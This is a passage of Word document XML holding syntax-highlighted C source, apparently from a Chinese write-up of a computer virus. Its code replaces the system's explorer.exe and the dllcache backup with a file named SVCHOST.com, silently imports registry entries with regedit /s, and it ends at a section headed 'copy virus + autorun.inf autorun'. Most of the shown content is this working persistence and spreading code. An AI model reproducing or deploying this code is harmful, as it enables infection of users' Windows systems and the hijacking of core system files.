      <w:r>
        <w:t>目的地：</w:t>
      </w:r>
      <w:r>
        <w:t>outfile</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>成功返回</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>，失败返回</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>copy</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> *infile, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> *outfile)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="005032"/>
        </w:rPr>
        <w:t>FILE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> *input, *output;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> temp;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pP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b/>
          <w:bCs/>
          <w:color w:val="642880"/>
        </w:rPr>
        <w:t>strcmp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(infile, outfile) != 0 &amp;&amp; ((input = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="642880"/>
        </w:rPr>
        <w:t>fopen</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(infile, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="2A00FF"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="2A00FF"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>rb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="2A00FF"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>)) != NULL)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">&amp;&amp; ((output = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="642880"/>
        </w:rPr>
        <w:t>fopen</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">(outfile, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="2A00FF"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="2A00FF"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>wb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="2A00FF"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>)) != NULL))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>{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!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="642880"/>
        </w:rPr>
        <w:t>feof</w:t>
      </w:r>
      <w:r>
        <w:t>(input))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>{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rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="642880"/>
        </w:rPr>
        <w:t>fread</w:t>
      </w:r>
      <w:r>
        <w:t>(&amp;temp, 1, 1, input);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rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="642880"/>
        </w:rPr>
        <w:t>fwrite</w:t>
      </w:r>
      <w:r>
        <w:t>(&amp;temp, 1, 1, output);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}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rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="642880"/>
        </w:rPr>
        <w:t>fclose</w:t>
      </w:r>
      <w:r>
        <w:t>(input);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rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="642880"/>
        </w:rPr>
        <w:t>fclose</w:t>
      </w:r>
      <w:r>
        <w:t>(output);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="source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0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t xml:space="preserve">} </w:t>
      </w:r>
      <w:r>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="source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1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00312869" w:rsidRDefault="00312869" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
        <w:sectPr w:rsidR="00312869" w:rsidSect="00C04F9C">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="849" w:bottom="1440" w:left="851" w:header="851" w:footer="992" w:gutter="0"/>
          <w:cols w:num="2" w:sep="1" w:space="425"/>
          <w:docGrid w:type="lines" w:linePitch="312"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="00B05E77" w:rsidP="00C625D0">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:t>2.4</w:t>
      </w:r>
      <w:r w:rsidR="00C625D0">
        <w:t>通过explorer自动运行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00312869" w:rsidRDefault="00312869" w:rsidP="009F2751">
      <w:pPr>
        <w:sectPr w:rsidR="00312869" w:rsidSect="005E498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F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>函数：通过</w:t>
      </w:r>
      <w:r>
        <w:t>explorer</w:t>
      </w:r>
      <w:r>
        <w:t>自动运行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>成功返回</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>，失败返回</w:t>
      </w:r>
      <w:r>
        <w:t>1,2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="7F0055"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> autorun_explorer()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="005032"/>
        </w:rPr>
        <w:t>FILE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> *input;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pP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 xml:space="preserve"> ((input = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="642880"/>
        </w:rPr>
        <w:t>fopen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>"c:\\windows\\system\\explorer.exe"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>rb</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>)) != NULL)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>{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rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="642880"/>
        </w:rPr>
        <w:t>fclose</w:t>
      </w:r>
      <w:r>
        <w:t>(input);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="source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642880"/>
        </w:rPr>
        <w:t>remove</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>"c:\\windows\\$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>temp</w:t>
      </w:r>
      <w:r>
        <w:t>$"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="source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642880"/>
        </w:rPr>
        <w:t>remove</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>"c:\\windows\\system32\\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>dllcache</w:t>
      </w:r>
      <w:r>
        <w:t>\\$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>temp</w:t>
      </w:r>
      <w:r>
        <w:t>$"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="source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1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>copy(</w:t>
      </w:r>
      <w:r>
        <w:t>"c:\\windows\\explorer.exe"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>"c:\\windows\\system\\explorer.exe"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="642880"/>
        </w:rPr>
        <w:t>rename</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>"c:\\windows\\explorer.exe"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>"c:\\windows\\$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>temp</w:t>
      </w:r>
      <w:r>
        <w:t>$"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>rename(</w:t>
      </w:r>
      <w:r>
        <w:t>"c:\\windows\\system32\\dllcache\\explorer.exe"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>"c:\\windows\\system32</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>\\dllcache\\$temp$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="2A00FF"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="source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copy(</w:t>
      </w:r>
      <w:r>
        <w:t>"SVCHOST.com"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>"c:\\windows\\explorer.exe"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>)==0 &amp;&amp; copy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="source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r>
        <w:t>"SVCHOST.com"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>"c:\\windows\\system32\\dllcache\\explorer.exe"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>)==0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="source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0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="source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2;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00312869" w:rsidRDefault="00312869" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
        <w:sectPr w:rsidR="00312869" w:rsidSect="00C04F9C">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="991" w:bottom="1440" w:left="993" w:header="851" w:footer="992" w:gutter="0"/>
          <w:cols w:num="2" w:sep="1" w:space="425"/>
          <w:docGrid w:type="lines" w:linePitch="312"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="00B05E77" w:rsidP="00C625D0">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:t>2.5</w:t>
      </w:r>
      <w:r w:rsidR="00C625D0">
        <w:t>添加注册表项</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>函数：添加注册表项</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>成功返回</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>，失败返回</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="7F0055"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> add_reg()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="005032"/>
        </w:rPr>
        <w:t>FILE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> *output;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ((output = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="642880"/>
        </w:rPr>
        <w:t>fopen</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="2A00FF"/>
        </w:rPr>
        <w:t>"$$$$$"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="2A00FF"/>
        </w:rPr>
        <w:t>"w"</w:t>
      </w:r>
      <w:r>
        <w:t>)) != NULL)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>{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rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>fprintf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(output, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>regadd</w:t>
      </w:r>
      <w:r>
        <w:t>);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rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="642880"/>
        </w:rPr>
        <w:t>fclose</w:t>
      </w:r>
      <w:r>
        <w:t>(output);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="source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642880"/>
        </w:rPr>
        <w:t>spawnl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">(1, </w:t>
      </w:r>
      <w:r>
        <w:t>"c:\\windows\\regedit.exe"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>" /s $$$$$"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>, NULL);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="00B05E77" w:rsidP="00C625D0">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:t>2.6</w:t>
      </w:r>
      <w:r w:rsidR="00C625D0">
        <w:t>复制病毒+autorun.inf自动运行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB32B7" w:rsidRDefault="00AB32B7" w:rsidP="00AB32B7">
      <w:pPr>
        <w:sectPr w:rsidR="00AB32B7" w:rsidSect="00C04F9C">
          <w:type w:val="continuous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:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>函数：复制病毒</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + Autorun.inf</w:t>
      </w:r>
      <w:r>
        <w:t>自动运行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
